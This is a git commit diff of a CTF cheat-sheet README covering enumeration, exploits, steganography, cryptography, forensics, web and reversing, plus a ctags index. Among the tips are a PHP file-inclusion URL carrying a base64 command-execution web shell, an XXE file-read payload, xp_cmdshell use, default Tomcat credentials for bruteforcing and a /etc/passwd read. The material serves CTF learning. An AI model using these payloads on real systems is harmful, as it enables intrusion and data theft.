added all

pull/34/head
mr-zero 2020-10-01 04:54:44 +05:30
parent 60c3273b7e
commit 1783d353eb
2 changed files with 141 additions and 73 deletions

172
README.md
View File

@ -17,7 +17,33 @@ are welcome!
1. [Post-Exploitation](#post-exploitation) 1. [Post-Exploitation](#post-exploitation)
2. [Port Enumeration](#port-enumeration) 2. [Port Enumeration](#port-enumeration)
2. [445 (smb/Samba)](#445-smbsamba) 3. [445 (smb/Samba)](#445-smbsamba)
4. [1433 (Microsoft SQL Server)](#1433-microsoft-sql-server)
5. [SNMP](#snmp)
6. [Microsoft Office Macros](#microsoft-office-macros)
7. [Retrieving Network Service Hashes](#retrieving-network-service-hashes)
8. [Windows Reverse Shells](#windows-reverse-shells)
9. [Known Exploits](#known-exploits)
10. [Excess](#excess)
11. [Esoteric Languages](#esoteric-languages)
13. [Steganography](#steganography)
14. [Cryptography](#cryptography)
15. [Networking](#networking)
16. [PHP](#php)
17. [PDF Files](#pdf-files)
18. [Forensics](#forensics)
19. [PNG File Forensics](#png-file-forensics)
20. [APK Forensics](#apk-forensics)
21. [Web](#web)
22. [Reverse Engineering](#reverse-engineering)
23. [PowerShell](#powerShell)
24. [Windows Executables](#windows-executables)
25. [Python Reversing](#python-reversing)
26. [Binary Exploitation/pwn](#binary-exploitationpwn)
27. [VisualBasicScript Reversing](#visualbasicscript-reversing)
28. [Miscellaneous](#miscellaneous)
29. [Jail Breaks](#jail-breaks)
30. [Trivia](#trivia)
--------------- ---------------
@ -40,7 +66,7 @@ Port Enumeration
* [`smbmap`](https://github.com/ShawnDEvans/smbmap) * [`smbmap`](https://github.com/ShawnDEvans/smbmap)
`smbmap` tells you permissions and access, which `smbclient` does _not_ do! `smbmap` tells you permissions and access, which `smbclient` does _not_ do!
To try and list shares as the anonymous user **DO THIS** (this doesn't always work for some weird reason) To try and list shares as the anonymous user **DO THIS** (this doesn't always work for some weird reason)
``` ```
@ -74,11 +100,11 @@ enum4linux 10.10.10.125
* `smbclient` * `smbclient`
**NOTE: DEPENDING ON THE VERSION OF SMBCLIENT YOU ARE USING, you may need to SPECIFY the use of S<B version 1 or SMB version 2. You can dp this with `-m SMB2`. Older versions of SMBclient (latest being 4.10 at the time of writing) use SMB1 _by default_.** **NOTE: DEPENDING ON THE VERSION OF SMBCLIENT YOU ARE USING, you may need to SPECIFY the use of S<B version 1 or SMB version 2. You can dp this with `-m SMB2`. Older versions of SMBclient (latest being 4.10 at the time of writing) use SMB1 _by default_.**
You can use `smbclient` to look through files shared with SMB. To _list_ available shares: You can use `smbclient` to look through files shared with SMB. To _list_ available shares:
``` ```
smbclient -m SMB2 -N -L //10.10.10.125/ smbclient -m SMB2 -N -L //10.10.10.125/
``` ```
@ -94,13 +120,13 @@ You will see a `smb: \>` prompt, and you can use `ls` and `get` to retrieve file
------------------------------ ------------------------------
* `impacket` -> `mssqlclient.py` * `impacket` -> `mssqlclient.py`
You can connect to a Microsoft SQL Server with `myssqlclient.py` knowing a username and password like so: You can connect to a Microsoft SQL Server with `myssqlclient.py` knowing a username and password like so:
``` ```
mssqlclient.py username@10.10.10.125 mssqlclient.py username@10.10.10.125
``` ```
It will prompt you for a password. **If your password fails, the server might be using "Windows authentication", which you can use with:** It will prompt you for a password. **If your password fails, the server might be using "Windows authentication", which you can use with:**
``` ```
@ -111,7 +137,7 @@ If you have access to a Micosoft SQL Server, you can try and `enable_xp_cmdshell
``` ```
SQL> enable_xp_cmdshell SQL> enable_xp_cmdshell
``` ```
though, you may not have permission. If that DOES succeed, you can now run commands like: though, you may not have permission. If that DOES succeed, you can now run commands like:
@ -181,16 +207,16 @@ Known Exploits
------------------ ------------------
* Java RMI * Java RMI
Metasploit module: `exploit/multi/misc/java_rmi_server` Metasploit module: `exploit/multi/misc/java_rmi_server`
When testing this, responses are _known to come back with an error or exception_. Your code MAY VERY WELL still be executing. Try and run commands that include a callback. And _use Python_ to live off the land and try avoid special characters, like `|` pipes! [ysoserial](https://github.com/frohoff/ysoserial) is a good tool for deserializing Java code to take advantage of this vulnerability. When testing this, responses are _known to come back with an error or exception_. Your code MAY VERY WELL still be executing. Try and run commands that include a callback. And _use Python_ to live off the land and try avoid special characters, like `|` pipes! [ysoserial](https://github.com/frohoff/ysoserial) is a good tool for deserializing Java code to take advantage of this vulnerability.
* Heartbleed * Heartbleed
Metasploit module: `auxiliary/scanner/ssl/openssl_heartbleed` Metasploit module: `auxiliary/scanner/ssl/openssl_heartbleed`
Be sure to use `set VERBOSE true` to see the retrieved results. This can often contain a flag or some valuable information. Be sure to use `set VERBOSE true` to see the retrieved results. This can often contain a flag or some valuable information.
* libssh - SSH * libssh - SSH
@ -204,7 +230,7 @@ Known Exploits
If you can determine that you are working with an Apache Tomcat server (usually by visiting pages that do not exist and seeing a 404 error message), try to visit `/Manager`, which is usually accessible on Tomcat. Possible credentials could be `tomcat:tomcat`, `tomcat:s3cr3t`, `admin:s3cr3t`, `root:s3cr3t`, etc. etc.. Worthy of bruteforcing with `hydra`. If you can determine that you are working with an Apache Tomcat server (usually by visiting pages that do not exist and seeing a 404 error message), try to visit `/Manager`, which is usually accessible on Tomcat. Possible credentials could be `tomcat:tomcat`, `tomcat:s3cr3t`, `admin:s3cr3t`, `root:s3cr3t`, etc. etc.. Worthy of bruteforcing with `hydra`.
If you see URLs are appended with a `.action` (not a `.do`), you may be working with Apache Struts. If you see URLs are appended with a `.action` (not a `.do`), you may be working with Apache Struts.
* Apache Struts * Apache Struts
@ -235,7 +261,7 @@ Esoteric Languages
* [https://tio.run/](https://tio.run/) * [https://tio.run/](https://tio.run/)
An online tool that has a ton of Esoteric language interpreters. An online tool that has a ton of Esoteric language interpreters.
* Brainfuck * Brainfuck
@ -280,9 +306,9 @@ Ook! Ook! Ook? Ook! Ook? Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook.
``` ```
* [Rockstar](https://codewithrockstar.com/) * [Rockstar](https://codewithrockstar.com/)
A language intended to look like song lyrics [github link](https://github.com/RockstarLang/rockstar). A language intended to look like song lyrics [github link](https://github.com/RockstarLang/rockstar).
below is fizzbuzz in Rockstar: below is fizzbuzz in Rockstar:
``` ```
Midnight takes your heart and your soul Midnight takes your heart and your soul
@ -293,7 +319,7 @@ Give back your heart
Desire is a lovestruck ladykiller Desire is a lovestruck ladykiller
My world is nothing My world is nothing
Fire is ice Fire is ice
Hate is water Hate is water
Until my world is Desire, Until my world is Desire,
@ -338,7 +364,7 @@ Steganography
* [`steghide`][steghide] * [`steghide`][steghide]
A command-line tool typically used alongside a password or key, that could be uncovered some other way when solving a challenge. A command-line tool typically used alongside a password or key, that could be uncovered some other way when solving a challenge.
* [`stepic`](http://domnit.org/stepic/doc/) * [`stepic`](http://domnit.org/stepic/doc/)
@ -372,7 +398,7 @@ Steganography
* Other stego tools: * Other stego tools:
[https://github.com/DominicBreuker/stego-toolkit](https://github.com/DominicBreuker/stego-toolkit) [https://github.com/DominicBreuker/stego-toolkit](https://github.com/DominicBreuker/stego-toolkit)
* [`zsteg`][zsteg] * [`zsteg`][zsteg]
Command-line tool for use against Least Significant Bit steganography... unfortunately only works against PNG and BMP images. Command-line tool for use against Least Significant Bit steganography... unfortunately only works against PNG and BMP images.
@ -399,7 +425,7 @@ Steganography
``` ```
mplayer -af scaletempo -speed 64 flag.mp3 mplayer -af scaletempo -speed 64 flag.mp3
``` ```
* DNA Codes * DNA Codes
@ -437,7 +463,7 @@ exiftool -b -ThumbnailImage my_image.jpg > my_thumbnail.jpg
* [`hipshot`][hipshot] * [`hipshot`][hipshot]
A [Python] module to compress a video into a single standalone image, simulating a long-exposure photograph. Was used to steal a [QR code] visible in a video, displayed through "Star Wars" style text motion. A [Python] module to compress a video into a single standalone image, simulating a long-exposure photograph. Was used to steal a [QR code] visible in a video, displayed through "Star Wars" style text motion.
* [QR code] * [QR code]
@ -445,12 +471,12 @@ exiftool -b -ThumbnailImage my_image.jpg > my_thumbnail.jpg
* [`zbarimg`][zbarimg] * [`zbarimg`][zbarimg]
A command-line tool to quickly scan multiple forms of barcodes, [QR codes] included. Installed like so on a typical [Ubuntu] image: A command-line tool to quickly scan multiple forms of barcodes, [QR codes] included. Installed like so on a typical [Ubuntu] image:
``` ```
sudo apt install zbar-tools sudo apt install zbar-tools
``` ```
* Punctuation marks `!`, `.` and `?` * Punctuation marks `!`, `.` and `?`
I have seen some challenges use just the end of `.` or `?` or `!` to represent the [Ook](http://esolangs.org/wiki/ook!) esoteric programming language. Don't forget that is a thing! I have seen some challenges use just the end of `.` or `?` or `!` to represent the [Ook](http://esolangs.org/wiki/ook!) esoteric programming language. Don't forget that is a thing!
@ -459,10 +485,10 @@ Cryptography
----------------- -----------------
* Cryptii * Cryptii
[https://cryptii.com](https://cryptii.com) has multiple decoding tools like base64, Ceaser Cipher, ROT13, Vigenère Cipher and more. [https://cryptii.com](https://cryptii.com) has multiple decoding tools like base64, Ceaser Cipher, ROT13, Vigenère Cipher and more.
* Keyboard Shift * Keyboard Shift
[https://www.dcode.fr/keyboard-shift-cipher](https://www.dcode.fr/keyboard-shift-cipher) If you see any thing that has the shape of a sentence but it looks like nonsense letters, and notes some shift left or right, it may be a keyboard shift... [https://www.dcode.fr/keyboard-shift-cipher](https://www.dcode.fr/keyboard-shift-cipher) If you see any thing that has the shape of a sentence but it looks like nonsense letters, and notes some shift left or right, it may be a keyboard shift...
* Bit Shift * Bit Shift
@ -522,14 +548,14 @@ Cryptography
[https://www.dcode.fr/beaufort-cipher](https://www.dcode.fr/beaufort-cipher) [https://www.dcode.fr/beaufort-cipher](https://www.dcode.fr/beaufort-cipher)
* [Bacon Cipher](https://en.wikipedia.org/wiki/Bacon%27s_cipher) * [Bacon Cipher](https://en.wikipedia.org/wiki/Bacon%27s_cipher)
A substitution cipher that replaces each character with five characters from a set of two (A and B is used most of the time). If we look at A as 0 and B as 1 it is a special encoding to binary numbers, where the character A has the value of binary `b00000`. Easy to recognize, because the ciphertext only contains two characters (e.g.: A and B) and the length of the ciphertext is divisible by 5. Example: `AAABB AAABA ABBAB AAABB AABAA AAAAB AAAAA AAABA ABBAB ABBAA`. A substitution cipher that replaces each character with five characters from a set of two (A and B is used most of the time). If we look at A as 0 and B as 1 it is a special encoding to binary numbers, where the character A has the value of binary `b00000`. Easy to recognize, because the ciphertext only contains two characters (e.g.: A and B) and the length of the ciphertext is divisible by 5. Example: `AAABB AAABA ABBAB AAABB AABAA AAAAB AAAAA AAABA ABBAB ABBAA`.
[Online tool](http://rumkin.com/tools/cipher/baconian.php) [Online tool](http://rumkin.com/tools/cipher/baconian.php)
* Python random module cracker/predictor * Python random module cracker/predictor
[https://github.com/tna0y/Python-random-module-cracker](https://github.com/tna0y/Python-random-module-cracker)... helps attack the Mersenne Twister used in Python's random module. [https://github.com/tna0y/Python-random-module-cracker](https://github.com/tna0y/Python-random-module-cracker)... helps attack the Mersenne Twister used in Python's random module.
* Transposition Cipher * Transposition Cipher
@ -560,8 +586,8 @@ def root3rd(x):
y3 = y**3 y3 = y**3
d = (2*y3+x) d = (2*y3+x)
y1 = (y*(y3+2*x)+d//2)//d y1 = (y*(y3+2*x)+d//2)//d
return y return y
``` ```
* RSA: Wiener's Little D Attack * RSA: Wiener's Little D Attack
@ -569,7 +595,7 @@ def root3rd(x):
* RSA: Boneh-Durfee Attack * RSA: Boneh-Durfee Attack
The tellgate sign for this kind of challenge is also an enormously large `e` value (`e` and `n` have similar size). The tellgate sign for this kind of challenge is also an enormously large `e` value (`e` and `n` have similar size).
Some code for this attack can be found [here](https://github.com/mimoo/RSA-and-LLL-attacks/blob/master/boneh_durfee.sage) Some code for this attack can be found [here](https://github.com/mimoo/RSA-and-LLL-attacks/blob/master/boneh_durfee.sage)
* RSA: Chinese Remainder Attack * RSA: Chinese Remainder Attack
@ -654,7 +680,7 @@ Networking
* [Wireshark] * [Wireshark]
The go-to tool for examining [`.pcap`][PCAP] files. The go-to tool for examining [`.pcap`][PCAP] files.
* [Network Miner] * [Network Miner]
@ -670,7 +696,7 @@ editcap old_file.pcapng new_file.pcap
* [`tcpflow`][tcpflow] * [`tcpflow`][tcpflow]
A command-line tool for reorganizing packets in a PCAP file and getting files out of them. __Typically it gives no output, but it creates the files in your current directory!__ A command-line tool for reorganizing packets in a PCAP file and getting files out of them. __Typically it gives no output, but it creates the files in your current directory!__
``` ```
tcpflow -r my_file.pcap tcpflow -r my_file.pcap
@ -732,7 +758,7 @@ PHP
* `preg_replace` * `preg_replace`
A bug in older versions of [PHP] where the user could get remote code execution A bug in older versions of [PHP] where the user could get remote code execution
[http://php.net/manual/en/function.preg-replace.php](http://php.net/manual/en/function.preg-replace.php) [http://php.net/manual/en/function.preg-replace.php](http://php.net/manual/en/function.preg-replace.php)
@ -756,14 +782,14 @@ http://xqi.cc/index.php?m=php://filter/convert.base64-encode/resource=index
``` ```
http://103.5.112.91:1234/?cmd=whoami&page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4= http://103.5.112.91:1234/?cmd=whoami&page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=
``` ```
PDF Files PDF Files
------------- -------------
* `pdfinfo` * `pdfinfo`
A command-line tool to get a basic synopsis of what the [PDF] file is. A command-line tool to get a basic synopsis of what the [PDF] file is.
* `pdfcrack` * `pdfcrack`
@ -785,9 +811,9 @@ Forensics
To decompile bytecode, use `uncompyle6`. There is one special argument (I think `-d` or something???) that can have success if the default operation does not work. Do not give up hope when working with obvious Python bytecode. EasyPythonDecompiler might work, or perhaps testing with `uncompyle` To decompile bytecode, use `uncompyle6`. There is one special argument (I think `-d` or something???) that can have success if the default operation does not work. Do not give up hope when working with obvious Python bytecode. EasyPythonDecompiler might work, or perhaps testing with `uncompyle`
* Keepass * Keepass
`keepassx` can be installed on Ubuntu to open and explore Keepass databases. Keepass databases master passwords can be cracked with `keepass2john`. `keepassx` can be installed on Ubuntu to open and explore Keepass databases. Keepass databases master passwords can be cracked with `keepass2john`.
* [Magic Numbers] * [Magic Numbers]
@ -839,13 +865,13 @@ sudo apt install foremost
* [photorec] * [photorec]
Another command-line utility that comes with `testdisk`. It is file data recovery software designed to recover lost files including video, documents and archives from hard disks, CD-ROMs, and lost pictures (thus the Photo Recovery name) from digital camera memory. PhotoRec ignores the file system and goes after the underlying data, so it will still work even if your media's file system has been severely damaged or reformatted. Another command-line utility that comes with `testdisk`. It is file data recovery software designed to recover lost files including video, documents and archives from hard disks, CD-ROMs, and lost pictures (thus the Photo Recovery name) from digital camera memory. PhotoRec ignores the file system and goes after the underlying data, so it will still work even if your media's file system has been severely damaged or reformatted.
* [Analysis Image] ['https://29a.ch/photo-forensics/#forensic-magnifier'] * [Analysis Image] ['https://29a.ch/photo-forensics/#forensic-magnifier']
Forensically is free online tool to analysis image this tool has many features like Magnifier, Clone Detection, Error Level analysis, Noise Analusis, level Sweep, Meta Data, Geo tags, Thumbnail Analysis , JPEG Analysis, Strings Extraction. Forensically is free online tool to analysis image this tool has many features like Magnifier, Clone Detection, Error Level analysis, Noise Analusis, level Sweep, Meta Data, Geo tags, Thumbnail Analysis , JPEG Analysis, Strings Extraction.
PNG File Forensics PNG File Forensics
@ -887,7 +913,7 @@ apktool d <file.apk>
* [`jd-gui`][jd-gui] * [`jd-gui`][jd-gui]
A GUI tool to decompile Java code, and JAR files. A GUI tool to decompile Java code, and JAR files.
Web Web
---------------- ----------------
@ -909,13 +935,13 @@ Web
This directory is often found by directory scanning bruteforce tools, so I recommend just checking the directory on your own, as part of your own "low-hanging fruits" check. This directory is often found by directory scanning bruteforce tools, so I recommend just checking the directory on your own, as part of your own "low-hanging fruits" check.
* `/.git/` * `/.git/`
A classic CTF challenge is to leave a `git` repository live and available on a website. You can see this with `nmap -A` (or whatever specific script catches it) and just by trying to view that specific folder, `/.git/`. A good command-line tool for this is [`GitDumper.sh`](https://github.com/internetwache/GitTools), or just simply using [`wget`][wget]. A classic CTF challenge is to leave a `git` repository live and available on a website. You can see this with `nmap -A` (or whatever specific script catches it) and just by trying to view that specific folder, `/.git/`. A good command-line tool for this is [`GitDumper.sh`](https://github.com/internetwache/GitTools), or just simply using [`wget`][wget].
**Sometimes you might Bazaar or Mercurial or other distributed version control systems. You can use [https://github.com/kost/dvcs-ripper](https://github.com/kost/dvcs-ripper) for those!!** **Sometimes you might Bazaar or Mercurial or other distributed version control systems. You can use [https://github.com/kost/dvcs-ripper](https://github.com/kost/dvcs-ripper) for those!!**
* [`GitDumper.sh`][GitDumper.sh] * [`GitDumper.sh`][GitDumper.sh]
A command-line tool that will automatically scrape and download a [git] repository hosted online with a given URL. A command-line tool that will automatically scrape and download a [git] repository hosted online with a given URL.
* Bazaar `.bzr` * Bazaar `.bzr`
@ -940,7 +966,7 @@ Web
* [CloudFlare Bypass](https://github.com/Anorov/cloudflare-scrape) * [CloudFlare Bypass](https://github.com/Anorov/cloudflare-scrape)
If you need to script or automate against a page that uses the I'm Under Attack Mode from CloudFlare, or DDOS protection, you can do it like this with linked Python module. If you need to script or automate against a page that uses the I'm Under Attack Mode from CloudFlare, or DDOS protection, you can do it like this with linked Python module.
``` python ``` python
#!/usr/bin/env python #!/usr/bin/env python
@ -948,8 +974,8 @@ import cfscrape
url = 'http://yashit.tech/tryharder/' url = 'http://yashit.tech/tryharder/'
scraper = cfscrape.create_scraper() scraper = cfscrape.create_scraper()
print scraper.get(url).content print scraper.get(url).content
``` ```
* [XSStrike] * [XSStrike]
@ -958,7 +984,7 @@ print scraper.get(url).content
* [`wpscan`][wpscan] * [`wpscan`][wpscan]
* A Ruby script to scan and do reconnaissance on a [Wordpress] application. * A Ruby script to scan and do reconnaissance on a [Wordpress] application.
* Mac AutoLogin Password Cracking * Mac AutoLogin Password Cracking
@ -989,15 +1015,15 @@ We try to display the content of the file /flag :
<data>&file;</data> <data>&file;</data>
<?xml version="1.0" encoding="UTF-16"?> <?xml version="1.0" encoding="UTF-16"?>
<!DOCTYPE foo [ <!DOCTYPE foo [
<!ELEMENT foo ANY > <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///flag" >]><foo>&xxe;</foo> <!ENTITY xxe SYSTEM "file:///flag" >]><foo>&xxe;</foo>
``` ```
* Wordpress Password Hash Generator * Wordpress Password Hash Generator
If you make it into a Wordpress database and can change passwords, reset the admin password to a new hash: [http://www.passwordtool.hu/wordpress-password-hash-generator-v3-v4](http://www.passwordtool.hu/wordpress-password-hash-generator-v3-v4). This will let you login to /wp-admin/ on the site. If you make it into a Wordpress database and can change passwords, reset the admin password to a new hash: [http://www.passwordtool.hu/wordpress-password-hash-generator-v3-v4](http://www.passwordtool.hu/wordpress-password-hash-generator-v3-v4). This will let you login to /wp-admin/ on the site.
* Cookie Catcher * Cookie Catcher
* [`requestb.in`](https://requestb.in/) * [`requestb.in`](https://requestb.in/)
@ -1010,7 +1036,7 @@ We try to display the content of the file /flag :
* [`sqlmap`][sqlmap] * [`sqlmap`][sqlmap]
A command-line tool written in [Python] to automatically detect and exploit vulnerable SQL injection points. A command-line tool written in [Python] to automatically detect and exploit vulnerable SQL injection points.
* Flask Template Injection * Flask Template Injection
@ -1025,11 +1051,11 @@ We try to display the content of the file /flag :
* Explicit SQL Injection * Explicit SQL Injection
* Blind SQL Injection * Blind SQL Injection
* MongoDB * MongoDB
Get MongoDB properly installed: Get MongoDB properly installed:
@ -1063,8 +1089,8 @@ c.find()
``` ```
* gobuster * gobuster
* DirBuster * DirBuster
@ -1092,7 +1118,7 @@ Reverse Engineering
Easy command-line tools to see some of the code being executed as you follow through a binary. Usage: `ltrace ./binary` Easy command-line tools to see some of the code being executed as you follow through a binary. Usage: `ltrace ./binary`
* [Hopper](https://www.hopperapp.com) * [Hopper](https://www.hopperapp.com)
Hopper Disassembler, the reverse engineering tool that lets you disassemble, decompile and debug your applications. Hopper Disassembler, the reverse engineering tool that lets you disassemble, decompile and debug your applications.
* [Binary Ninja](https://binary.ninja) * [Binary Ninja](https://binary.ninja)
@ -1118,7 +1144,7 @@ Reverse Engineering
* Compiling & running ASM code: * Compiling & running ASM code:
You can convert ASM functions from assembly and run them as C functions like the following: You can convert ASM functions from assembly and run them as C functions like the following:
`asm4.S` `asm4.S`
```asm ```asm
.intel_syntax noprefix .intel_syntax noprefix
@ -1139,7 +1165,7 @@ Reverse Engineering
add eax,edx add eax,edx
movzx eax,BYTE PTR [eax] movzx eax,BYTE PTR [eax]
test al,al test al,al
jne label1 jne label1
mov DWORD PTR [ebp-0x8],0x1 mov DWORD PTR [ebp-0x8],0x1
jmp label3 jmp label3
label4: label4:
@ -1184,7 +1210,7 @@ Reverse Engineering
add esp,0x10 add esp,0x10
pop ebx pop ebx
pop ebp pop ebp
ret ret
``` ```
`asm4.c` `asm4.c`
@ -1225,7 +1251,7 @@ Windows Executables
* [`pefile`][pefile] * [`pefile`][pefile]
A [Python] module that examines the headers in a Windows [PE (Portable Executable)][PE] file. A [Python] module that examines the headers in a Windows [PE (Portable Executable)][PE] file.
* [dnSpy] * [dnSpy]
@ -1233,14 +1259,14 @@ Windows Executables
* [PEiD][PEiD] * [PEiD][PEiD]
A [Windows] tool to detect common packers, cryptors and compilers for [Windows][Windows] [PE][PE] A [Windows] tool to detect common packers, cryptors and compilers for [Windows][Windows] [PE][PE]
* jetBrains .NET decompiler * jetBrains .NET decompiler
* AutoIT converter * AutoIT converter
When debugging AutoIT programs, you may get a notification: "This is a compiled AutoIT script". Here is a good thing to use to decode them: [https://www.autoitscript.com/site/autoit/downloads/](https://www.autoitscript.com/site/autoit/downloads/) When debugging AutoIT programs, you may get a notification: "This is a compiled AutoIT script". Here is a good thing to use to decode them: [https://www.autoitscript.com/site/autoit/downloads/](https://www.autoitscript.com/site/autoit/downloads/)
Python Reversing Python Reversing
------------ ------------
@ -1255,7 +1281,7 @@ Binary Exploitation/pwn
* Basic Stack Overflow * Basic Stack Overflow
Use `readelf -s <binary>` to get the location of a function to jump to -- overflow in Python, find offset with `dmesg`, and jump. Use `readelf -s <binary>` to get the location of a function to jump to -- overflow in Python, find offset with `dmesg`, and jump.
* `printf` vulnerability * `printf` vulnerability
@ -1267,7 +1293,7 @@ Binary Exploitation/pwn
* 64-bit Buffer Overflow * 64-bit Buffer Overflow
64-bit buffer overflow challenges are often difficult because the null bytes get in the way of memory addresses (for the function you want to jump to, that you can usually find with `readelf -s`). But, check if whether or not the function address you need starts with the same hex values already on the stack (in `rsp`). Maybe you only have to write two or three bytes after the overflow, rather than the whole function address. 64-bit buffer overflow challenges are often difficult because the null bytes get in the way of memory addresses (for the function you want to jump to, that you can usually find with `readelf -s`). But, check if whether or not the function address you need starts with the same hex values already on the stack (in `rsp`). Maybe you only have to write two or three bytes after the overflow, rather than the whole function address.
VisualBasicScript Reversing VisualBasicScript Reversing
@ -1339,7 +1365,7 @@ l(DId<j@<?3r@:F%a+D58'ATD4$Bl@l3De:,-DJs`8ARoFb/0JMK@qB4^F!,R<AKZ&-DfTqBG%G
𤇃𢊻𤄻嶜𤄋𤇁𡊻𤄛𤆬𠲻𤆻𠆜𢮻𤆻ꊌ𢪻𤆻邌𤆻𤊻𤅋𤲥𣾻𤄋𥆸𣊻𤅛ꊌ𤆻𤆱炼綻𤋅𤅴薹𣪻𣊻𣽻𤇆𤚢𣺻赈𤇣綹𤻈𤇣𤾺𤇃悺𢦻𤂻𤅠㢹𣾻𤄛𤆓𤦹𤊻𤄰炜傼𤞻𢊻𣲻𣺻ꉌ邹𡊻𣹫𤅋𤇅𣾻𤇄𓎜𠚻𤊻𢊻𤉛𤅫𤂑𤃃𡉌𤵛𣹛𤁐𢉋𡉻𡡫𤇠𠞗𤇡𡊄𡒌𣼻燉𣼋𦄘炸邹㢸𠞻𠦻𡊻𣈻𡈻𣈛𡈛ꊺ𠆼𤂅𣻆𣫃𤮺𤊻𡉋㽻𣺬𣈛𡈋𤭻𤂲𣈻𤭻𤊼𢈛儛𡈛ᔺ 𤇃𢊻𤄻嶜𤄋𤇁𡊻𤄛𤆬𠲻𤆻𠆜𢮻𤆻ꊌ𢪻𤆻邌𤆻𤊻𤅋𤲥𣾻𤄋𥆸𣊻𤅛ꊌ𤆻𤆱炼綻𤋅𤅴薹𣪻𣊻𣽻𤇆𤚢𣺻赈𤇣綹𤻈𤇣𤾺𤇃悺𢦻𤂻𤅠㢹𣾻𤄛𤆓𤦹𤊻𤄰炜傼𤞻𢊻𣲻𣺻ꉌ邹𡊻𣹫𤅋𤇅𣾻𤇄𓎜𠚻𤊻𢊻𤉛𤅫𤂑𤃃𡉌𤵛𣹛𤁐𢉋𡉻𡡫𤇠𠞗𤇡𡊄𡒌𣼻燉𣼋𦄘炸邹㢸𠞻𠦻𡊻𣈻𡈻𣈛𡈛ꊺ𠆼𤂅𣻆𣫃𤮺𤊻𡉋㽻𣺬𣈛𡈋𤭻𤂲𣈻𤭻𤊼𢈛儛𡈛ᔺ
``` ```
* [Base41](https://github.com/sveljko/base41/blob/master/python/base41.py) * [Base41](https://github.com/sveljko/base41/blob/master/python/base41.py)
* Mac / Macintosh / Apple Hidden Files `.DS_Store` [ds_store_exp](https://github.com/lijiejie/ds_store_exp) * Mac / Macintosh / Apple Hidden Files `.DS_Store` [ds_store_exp](https://github.com/lijiejie/ds_store_exp)
@ -1362,7 +1388,7 @@ l(DId<j@<?3r@:F%a+D58'ATD4$Bl@l3De:,-DJs`8ARoFb/0JMK@qB4^F!,R<AKZ&-DfTqBG%G
Use Use
* 15 Puzzle * 15 Puzzle
A sliding puzzle that consists of a 4x4 grid with numbered square tiles, with one missing, set in a random order. It was involved in SharifCTF to determine if a group of these puzzles was solvable: [https://theromanxpl0it.github.io/ctf_sharifctf18/fifteenpuzzle/](https://theromanxpl0it.github.io/ctf_sharifctf18/fifteenpuzzle/) A sliding puzzle that consists of a 4x4 grid with numbered square tiles, with one missing, set in a random order. It was involved in SharifCTF to determine if a group of these puzzles was solvable: [https://theromanxpl0it.github.io/ctf_sharifctf18/fifteenpuzzle/](https://theromanxpl0it.github.io/ctf_sharifctf18/fifteenpuzzle/)
@ -1386,7 +1412,7 @@ sudo apt install -y caca-utils
* Strange Symbols/Characters * Strange Symbols/Characters
Some CTFs will try and hide a message on a picture with strange symbols. Try and Google Reverse Image searching these. They may be Egyptian Characters: Some CTFs will try and hide a message on a picture with strange symbols. Try and Google Reverse Image searching these. They may be Egyptian Characters:
![http://www.virtual-egypt.com/newhtml/hieroglyphics/sample/alphabet.gif](http://www.virtual-egypt.com/newhtml/hieroglyphics/sample/alphabet.gif) ![http://www.virtual-egypt.com/newhtml/hieroglyphics/sample/alphabet.gif](http://www.virtual-egypt.com/newhtml/hieroglyphics/sample/alphabet.gif)
@ -1411,7 +1437,7 @@ MCA{I$love$bitcoin$so$much!}
* Missing `ls` or `dir` commands * Missing `ls` or `dir` commands
If you cannot run `ls` or `dir`, or `find` or `grep`, to list files you can use If you cannot run `ls` or `dir`, or `find` or `grep`, to list files you can use
``` ```
echo * echo *
@ -1428,11 +1454,11 @@ mapfile -t < /etc/passwd
printf "$s\n" "${anything[@]}" printf "$s\n" "${anything[@]}"
``` ```
Jail Breaks Jail Breaks
---------- ----------
Sometimes you're jailed in an environment where you can potentially execute code. Sometimes you're jailed in an environment where you can potentially execute code.
* Python 3 * Python 3
`().__class__.__base__.__subclasses__()` - Gives access to `object` subclasses `().__class__.__base__.__subclasses__()` - Gives access to `object` subclasses
Trivia Trivia
@ -1487,7 +1513,7 @@ ICMP
``` ```
* We are a CTF team which is open to everybody. Who are we? * We are a CTF team which is open to everybody. Who are we?
``` ```

42
tags Normal file
View File

@ -0,0 +1,42 @@
!_TAG_FILE_FORMAT 2 /extended format; --format=1 will not append ;" to lines/
!_TAG_FILE_SORTED 1 /0=unsorted, 1=sorted, 2=foldcase/
!_TAG_OUTPUT_FILESEP slash /slash or backslash/
!_TAG_OUTPUT_MODE u-ctags /u-ctags or e-ctags/
!_TAG_PROGRAM_AUTHOR Universal Ctags Team //
!_TAG_PROGRAM_NAME Universal Ctags /Derived from Exuberant Ctags/
!_TAG_PROGRAM_URL https://ctags.io/ /official site/
!_TAG_PROGRAM_VERSION 0.0.0 /a3c87ab5/
1433 (Microsoft SQL Server) README.md /^1433 (Microsoft SQL Server)$/;" s
445 (smb/Samba) README.md /^445 (smb\/Samba)$/;" s
APK Forensics README.md /^APK Forensics$/;" s
Binary Exploitation/pwn README.md /^Binary Exploitation\/pwn$/;" s
CTF-Katana README.md /^CTF-Katana$/;" c
Cryptography README.md /^Cryptography$/;" s
DO NOT FORGET TO JUST BRUTEFORCE JUST THE FIRST BYTE, OR TWO BYTES OR THREE BYTES. README.md /^# DO NOT FORGET TO JUST BRUTEFORCE JUST THE FIRST BYTE, OR TWO BYTES OR THREE BYTES.$/;" c
Esoteric Languages README.md /^Esoteric Languages$/;" s
Excess README.md /^Excess$/;" s
Forensics README.md /^Forensics$/;" s
IF YOU KNOW A DECENT CRIB (PLAINTEXT), USE CYBERCHEF TO HELP DETERMINE THE KEY README.md /^# IF YOU KNOW A DECENT CRIB (PLAINTEXT), USE CYBERCHEF TO HELP DETERMINE THE KEY$/;" c
Jail Breaks README.md /^Jail Breaks$/;" s
Known Exploits README.md /^Known Exploits$/;" s
Microsoft Office Macros README.md /^Microsoft Office Macros$/;" s
Miscellaneous README.md /^Miscellaneous$/;" s
Networking README.md /^Networking$/;" s
PDF Files README.md /^PDF Files$/;" s
PHP README.md /^PHP$/;" s
PNG File Forensics README.md /^PNG File Forensics$/;" s
Port Enumeration README.md /^Port Enumeration$/;" c
Post-Exploitation README.md /^Post-Exploitation$/;" c
